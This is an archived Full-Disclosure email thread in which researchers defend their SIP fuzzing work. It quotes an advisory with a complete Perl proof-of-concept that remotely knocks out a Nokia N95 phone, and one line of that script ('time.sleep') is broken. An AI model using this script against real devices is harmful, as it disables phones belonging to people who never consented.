<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=windows-1252"
http-equiv="Content-Type">
</head>
<body bgcolor="#ffffff" text="#000000">
<br>
<blockquote
cite="mid:28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com"
type="cite">I think you're missing his point. In fact I might be too
but my take on it is this.... you'd think two PhD's and a PhD student
might be able to do something a little more advanced than running a
fuzzer and reporting DoS conditions.
<br>
</blockquote>
Well, in fact as part of our research we are working on smart
techniques of how to fuzz. So, whenever we come up with something new,
the first thing to do is to test it either if it works or not.
Therefore, the vulnerabilities we had found. <br>
<blockquote
cite="mid:28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com"
type="cite">Do you guys even investigate the DoS to determine the root
cause? If ye did then that might be OK and considered PhD level. I
would think that a PhD level interpretation of this area might be for
instance..... running a fuzzer against a hardware phone and then
getting some form of code execution. Yes? No? Maybe? </blockquote>
We do not investigate the cause, as soon as we find a vulnerability we
try to see if we can replay it and later send it to the appropriate
company to allows them to fix it. As i told you before, the
vulnerabilities found are just experimental results of our advances.<br>
<blockquote
cite="mid:28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com"
type="cite">It looks to me like someone one of you guys built a VoIP
fuzzer (is it even a VoIP fuzzer or just SIP?)</blockquote>
In fact, KiF can be split in two (in a very simplistic way).<br>
1) A Generic Syntax Fuzzer able just to generate/parse messages. It
takes a ABNF as input and it does the rest respecting or not the ABNF
grammar. <br>
2) A Statefull fuzzer able to keep track of the remote state
machine and a local testing state machine.<br>
<br>
So, the first item can be useful for any non-flat ABNF grammar (e.g.
TCP won't work). Usually those grammars can be found at the RFCs. So,
different to most others fuzzers the extensibility and precision is
easily achieve. In terms of the second item, it is totally dependent
of SIP at the moment, mostly due to the need of Dialog and
Transaction identification. However, we expect to generalize that in a
middle term future.<br>
<blockquote
cite="mid:28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com"
type="cite"> and for the remainder of your doctoral studies you will
be purchasing equipment and hitting the 'Fuzz' button. As I said, if
you're gonna be submitting this kind of stuff to every list you can
then at least investigate the root cause, maybe then it'll provide some
slightly more interesting reading and perhaps benefit your thesis.
<br>
</blockquote>
I already replied to it.<br>
<br>
Concerning to the comments from Reepex, i apologize for all these mails
that you received from us, but thanks to this list we had plenty of
good feedbacks from our work. As the purpose of the list is between
others to disclose vulnerabilities, either we will have that permanent
fights or simply you can ignore us. However, thanks for your comments
of how to write better perl code (i can accepts comment of how to write
better English as well :). Either ways, i will take a look on the perl
advises before writing a new script. As Radu said earlier on, we are
not expert on perl and personally not a big fan. The idea was just to
show how to replay the problem.<br>
<br>
Humberto Abdelnur<br>
Phd student ;)<br>
<blockquote
cite="mid:28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com"
type="cite">nnp<br>
<br>
-----BEGIN PGP SIGNATURE-----<br>
Version: GnuPG v1.4.7 (Darwin)<br>
Comment: <a moz-do-not-send="true" href="http://firegpg.tuxfamily.org">http://firegpg.tuxfamily.org</a><br>
<br>
iD8DBQFHV5DhbP10WPHfgnQRAtMNAJ43x7ZJDyVn0njZi2zTMQIQQoB6bgCeK8k7
<br>
addmL2c5Jm4LrlQvahnBrgY=<br>
=YX4u<br>
-----END PGP SIGNATURE-----<br>
<div class="gmail_quote">On Dec 5, 2007 11:57 AM, <<a
moz-do-not-send="true" href="mailto:state@loria.fr">state@loria.fr</a>>
wrote:<br>
<blockquote class="gmail_quote"
style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">hi
Reepex,<br>
<br>
I do not understand why are frustrated about a computer science degree.
Maybe,<br>
someone got dropped out of a degree programm and some psychological
trauma gets<br>
activated when seeing a Ph.D?<br>
<br>
If you like it or not, in order to get a computer science degree, you
will have<br>
to take classes, and most classes are taught by Ph.Ds.<br>
<br>
I will not argue with you on why I use the Ph.D in my signature, but if
you
<br>
really want to know, look at our research papers published in academic<br>
journals/conferences. (If you do not find them, I can send them to you).<br>
If you will ever understand the contents, then you will understand what
are our
<br>
credentials..:) This will probably never happen.<br>
<br>
At least, I use a signature and a real name and do not hide behind a
gmail<br>
account.<br>
<br>
Meanwhile try yourself to find at least one vulnerability and enjoy
Perl
<br>
programming, it seemes your computer science skills are somehow in this
area :)<br>
<br>
<br>
Greetings<br>
<br>
<br>
<br>
<br>
RS<br>
<br>
<br>
Selon reepex <<a moz-do-not-send="true"
href="mailto:reepex@gmail.com">reepex@gmail.com</a>>:<br>
<div>
<div class="Wj3C7c"><br>
> So almighty Phd what is your thesis exactly?<br>
><br>
> To me it seems to be 'how to run a fuzzer then write crappy perl
scripts<br>
> to exploit DoS conditions'<br>
><br>
> does this properly summarize your phd credentials?<br>
><br>
> I guess you could tack on 'after writing the crappy scripts,
flood mailing<br>
> lists with our crap, and get made fun of'<br>
>
<br>
> I am sure you will serve the academic community great one day when
teach<br>
> "hacking" classes revolving around the latest editions of hacking
exposed<br>
><br>
><br>
><br>
> On Dec 5, 2007 11:05 AM, Radu State <
<a moz-do-not-send="true" href="mailto:State@loria.fr">State@loria.fr</a>>
wrote:<br>
><br>
> > Nokia N95 cellphone remote DoS using the SIP Stack<br>
> ><br>
> ><br>
> ><br>
> > Severity:<br>
> ><br>
> > High – Denial of Service
<br>
> ><br>
> ><br>
> ><br>
> > Hardware:<br>
> ><br>
> > Nokia N95<br>
> ><br>
> ><br>
> ><br>
> > Firmware:<br>
> ><br>
> > Tested version: Nokia RM-159 V 12.0.013
<br>
> ><br>
> ><br>
> ><br>
> > Notification:<br>
> ><br>
> > Vulnerability found: 11 September 2007<br>
> ><br>
> > Contact Nokia Support: 12 September 2007 / None reply Contact
Nokia
<br>
> > Security Support: 19 September 2007 / None reply<br>
> ><br>
> ><br>
> ><br>
> > Vulnerability Synopsis:<br>
> ><br>
> > If the device has the SIP Phone client activated, a sequence
of SIP
<br>
> > messages turn the device in an inconsistent state where the
user is not<br>
> able<br>
> > to operate it anymore until it reboots.<br>
> ><br>
> ><br>
> ><br>
> > The sequence of messages consists in 2 different SIP Dialogs
where the
<br>
> > first initiates an INVITE transaction but immediately closes
it (in an<br>
> > anticipated manner). While, the second transaction initiates
a normal<br>
> INVITE<br>
> > transaction that trigger the vulnerability of the target.
<br>
> ><br>
> ><br>
> ><br>
> > The sequence of messages is illustrated below.<br>
> ><br>
> ><br>
> ><br>
> > X ------------------------- INVITE
-----------------------> Nokiav12
<br>
> ><br>
> > X <---------------------- 100 Trying
---------------------- Nokiav12<br>
> ><br>
> > X ------------------------- CANCEL
-----------------------> Nokiav12<br>
> ><br>
> > X <----------------- OK (to the Cancel)
------------------- Nokiav12
<br>
> ><br>
> > X <---------------- 487 Request Terminated
---------------- Nokiav12<br>
> ><br>
> ><br>
> ><br>
> > --------New Dialog--------<br>
> ><br>
> ><br>
> ><br>
> > X ------------------------- INVITE
-----------------------> Nokiav12<br>
> ><br>
> > X <---------------------- 100 Trying
---------------------- Nokiav12<br>
> ><br>
> > X <---------------------- 180 Trying
---------------------- Nokiav12
<br>
> ><br>
> ><br>
> ><br>
> > ---- The device does not work properly anymore ----<br>
> ><br>
> ><br>
> ><br>
> > Impact:<br>
> ><br>
> > A remote entity can take down all the services of the cell
phone
<br>
> ><br>
> ><br>
> ><br>
> > Resolution:<br>
> ><br>
> > As we did not get any proper reply from Nokia about the
subject, the best<br>
> > way will be to disable the SIP Client<br>
> >
<br>
> ><br>
> ><br>
> > Credits:<br>
> ><br>
> > Humberto J. Abdelnur (Ph.D Student)<br>
> ><br>
> > Radu State (Ph.D)<br>
> ><br>
> > Olivier Festor (Ph.D)<br>
> ><br>
> >
<br>
> ><br>
> > This vulnerability was identified by the Madynes research
team at INRIA<br>
> > Lorraine, using KiF the Madynes VoIP fuzzer.<br>
> ><br>
> > <a moz-do-not-send="true" href="http://madynes.loria.fr/"
target="_blank">
http://madynes.loria.fr/</a><br>
> ><br>
> ><br>
> ><br>
> ><br>
> ><br>
> > Proof of Concept:<br>
> ><br>
> ><br>
> ><br>
> > A perl script (nokiav12.pl) is attached to this mail. Before
launching
<br>
> ><br>
> > it, the SIP phone has to be initialed in the target device<br>
> ><br>
> ><br>
> ><br>
> > Command:<br>
> ><br>
> > perl nokiav12.pl <dst_IP> <username>
<SourceIp> <SourceUsername>
<br>
> ><br>
> ><br>
> ><br>
> > Eg. perl nokiav12.pl <a moz-do-not-send="true"
href="http://192.168.1.119" target="_blank">192.168.1.119</a> lupilu <a
moz-do-not-send="true" href="http://192.168.1.2" target="_blank">192.168.1.2</a>
tucu<br>
> >
<br>
> ><br>
> ><br>
> ><br>
> ><br>
> > #!/usr/bin/perl<br>
> ><br>
> ><br>
> ><br>
> > ##################################################<br>
> ><br>
> > # Vulnerabily discovered using KiF ~ Kiph #
<br>
> ><br>
> > # #<br>
> ><br>
> > # Authors: #<br>
> ><br>
> > # Humberto J. Abdelnur (Ph.D Student) #<br>
> ><br>
> > # Radu State (Ph.D) #<br>
> ><br>
> > # Olivier Festor (
Ph.D) #<br>
> ><br>
> > # #<br>
> ><br>
> > # Madynes Team, LORIA - INRIA Lorraine #<br>
> ><br>
> > # <a moz-do-not-send="true" href="http://madynes.loria.fr"
target="_blank">http://madynes.loria.fr</a> #<br>
> >
<br>
> > ##################################################<br>
> ><br>
> ><br>
> ><br>
> > use IO::Socket::INET;<br>
> ><br>
> > use String::Random;<br>
> ><br>
> ><br>
> >
<br>
> > die "Usage $0 <targetIP> <targetUser>
<attackerIP> <attackerUser>"<br>
> ><br>
> > unless ($ARGV[3]);<br>
> ><br>
> ><br>
> ><br>
> > $targetUser = $ARGV[1];
<br>
> ><br>
> > $targetIP = $ARGV[0];<br>
> ><br>
> ><br>
> ><br>
> > $attackerUser = $ARGV[3];<br>
> ><br>
> > $attackerIP= $ARGV[2];<br>
> ><br>
> ><br>
> ><br>
> > $socket=new IO::Socket::INET->new(
<br>
> ><br>
> > Proto=>'udp',<br>
> ><br>
> > PeerPort=>5060,<br>
> ><br>
> > PeerAddr=>$targetIP,<br>
> ><br>
> > LocalPort=>5060);<br>
> ><br>
> ><br>
> ><br>
> > $foo = new String::Random;<br>
> ><br>
> > $callid= $foo->randpattern("CCccnCn");<br>
> ><br>
> > $cseq = $foo->randregex('\d\d\d\d');<br>
> ><br>
> >
<br>
> ><br>
> > $sdp = "v=0\r<br>
> ><br>
> > o=Lupilu 63356722367567875 63356722367567875 IN IP4
$attackerIP\r<br>
> ><br>
> > s=-\r<br>
> ><br>
> > c=IN IP4 $attackerIP\r<br>
> ><br>
> > t=0 0\r<br>
> ><br>
> > m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r<br>
> ><br>
> > a=sendrecv\r<br>
> ><br>
> > a=ptime:20\r<br>
> ><br>
> > a=maxptime:200\r<br>
> ><br>
> > a=fmtp:96 mode-change-neighbor=1\r<br>
> ><br>
> > a=fmtp:18 annexb=no\r<br>
> ><br>
> > a=fmtp:98 0-15\r<br>
> ><br>
> > a=rtpmap:96 AMR/8000/1\r<br>
> ><br>
> > a=rtpmap:0 PCMU/8000/1\r
<br>
> ><br>
> > a=rtpmap:8 PCMA/8000/1\r<br>
> ><br>
> > a=rtpmap:97 iLBC/8000/1\r<br>
> ><br>
> > a=rtpmap:18 G729/8000/1\r<br>
> ><br>
> > a=rtpmap:98 telephone-event/8000/1\r<br>
> ><br>
> > a=rtpmap:13 CN/8000/1\r<br>
> ><br>
> > ";<br>
> ><br>
> ><br>
> ><br>
> > $sdplen= length $sdp;<br>
> ><br>
> ><br>
> ><br>
> > $msg = "INVITE <a class="moz-txt-link-freetext" href="sip:$targetUser\@$targetIP">sip:$targetUser\@$targetIP</a> SIP/2.0\r
<br>
> ><br>
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r<br>
> ><br>
> > From: <a class="moz-txt-link-rfc2396E" href="sip:$attackerUser\@$attackerIP"><sip:$attackerUser\@$attackerIP></a>;tag=1\r<br>
> ><br>
> > To: <a class="moz-txt-link-rfc2396E" href="sip:$targetUser\@$targetIP"><sip:$targetUser\@$targetIP></a>\r<br>
> ><br>
> > Call-ID: $callid\@$attackerIP\r<br>
> ><br>
> > CSeq: $cseq INVITE\r<br>
> ><br>
> > Max-Forwards: 70\r<br>
> ><br>
> > Contact: <a class="moz-txt-link-rfc2396E" href="sip:$attackerUser\@$attackerIP"><sip:$attackerUser\@$attackerIP></a>\r
<br>
> ><br>
> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE,
NOTIFY,<br>
> ><br>
> > MESSAGE\r<br>
> ><br>
> > Content-Type: application/sdp\r<br>
> ><br>
> > Content-Length: $sdplen\r
<br>
> ><br>
> > \r<br>
> ><br>
> > $sdp";<br>
> ><br>
> > $socket->send($msg);<br>
> ><br>
> > $text = '';<br>
> ><br>
> > while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
<br>
> ><br>
> > $socket->recv($text,1024,0);<br>
> ><br>
> > }<br>
> ><br>
> ><br>
> ><br>
> > $msg = "CANCEL <a class="moz-txt-link-freetext" href="sip:$targetUser\@$targetIP">sip:$targetUser\@$targetIP</a> SIP/2.0\r<br>
> ><br>
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
<br>
> ><br>
> > From: <a class="moz-txt-link-rfc2396E" href="sip:$attackerUser\@$attackerIP"><sip:$attackerUser\@$attackerIP></a>;tag=1\r<br>
> ><br>
> > To: <a class="moz-txt-link-rfc2396E" href="sip:$targetUser\@$targetIP"><sip:$targetUser\@$targetIP></a>;tag=1\r<br>
> ><br>
> > Call-ID: $callid\@$attackerIP\r<br>
> >
<br>
> > CSeq: $cseq CANCEL\r<br>
> ><br>
> > Max-Forwards: 70\r<br>
> ><br>
> > Content-Length: 0\r<br>
> ><br>
> > \r<br>
> ><br>
> > ";<br>
> ><br>
> > $socket->send($msg);
<br>
> ><br>
> > time.sleep(1);<br>
> ><br>
> > $callid= $foo->randpattern("CCccnCn");<br>
> ><br>
> > $cseq = $foo->randregex('\d\d\d\d');<br>
> ><br>
> > $msg = "INVITE <a class="moz-txt-link-freetext" href="sip:$targetUser\@$targetIP">sip:$targetUser\@$targetIP</a> SIP/2.0\r
<br>
> ><br>
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r<br>
> ><br>
> > From: <a class="moz-txt-link-rfc2396E" href="sip:$attackerUser\@$attackerIP"><sip:$attackerUser\@$attackerIP></a>;tag=2\r<br>
> ><br>
> > To: <a class="moz-txt-link-rfc2396E" href="sip:$targetUser\@$targetIP"><sip:$targetUser\@$targetIP></a>\r<br>
> ><br>
> > Call-ID: $callid\@$attackerIP\r<br>
> ><br>
> > CSeq: $cseq INVITE\r<br>
> ><br>
> > Contact: <a class="moz-txt-link-rfc2396E" href="sip:$attackerUser\@$attackerIP"><sip:$attackerUser\@$attackerIP></a>\r<br>
> ><br>
> > Max-Forwards: 70\r
<br>
> ><br>
> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE,
NOTIFY,<br>
> ><br>
> > MESSAGE\r<br>
> ><br>
> > Content-Type: application/sdp\r<br>
> ><br>
> > Content-Length: $sdplen\r
<br>
> ><br>
> > \r<br>
> ><br>
> > $sdp";<br>
> ><br>
> > $socket->send($msg);<br>
> ><br>
> ><br>
> ><br>
> ><br>
> ><br>
> ><br>
> ><br>
> > No virus found in this outgoing message.
<br>
> > Checked by AVG Free Edition.<br>
> > Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release
Date:<br>
> > 04/12/2007 19:31<br>
> ><br>
> > _______________________________________________
<br>
> > Full-Disclosure - We believe in it.<br>
> > Charter: <a moz-do-not-send="true"
href="http://lists.grok.org.uk/full-disclosure-charter.html"
target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
> > Hosted and sponsored by Secunia - <a moz-do-not-send="true"
href="http://secunia.com/" target="_blank">http://secunia.com/</a><br>
> ><br>
><br>
<br>
<br>
_______________________________________________<br>
Full-Disclosure - We believe in it.<br>
Charter: <a moz-do-not-send="true"
href="http://lists.grok.org.uk/full-disclosure-charter.html"
target="_blank">
http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
Hosted and sponsored by Secunia - <a moz-do-not-send="true"
href="http://secunia.com/" target="_blank">http://secunia.com/</a><br>
</div>
</div>
</blockquote>
</div>
<br>
<br clear="all">
<br>
-- <br>
<a moz-do-not-send="true" href="http://www.smashthestack.org">http://www.smashthestack.org</a><br>
<a moz-do-not-send="true" href="http://www.unprotectedhex.com">http://www.unprotectedhex.com</a>
<br>
<br>
<pre wrap="">
<hr size="4" width="90%">
_______________________________________________
Full-Disclosure - We believe in it.
Charter: <a class="moz-txt-link-freetext" href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html</a>
Hosted and sponsored by Secunia - <a class="moz-txt-link-freetext" href="http://secunia.com/">http://secunia.com/</a></pre>
</blockquote>
</body>
</html>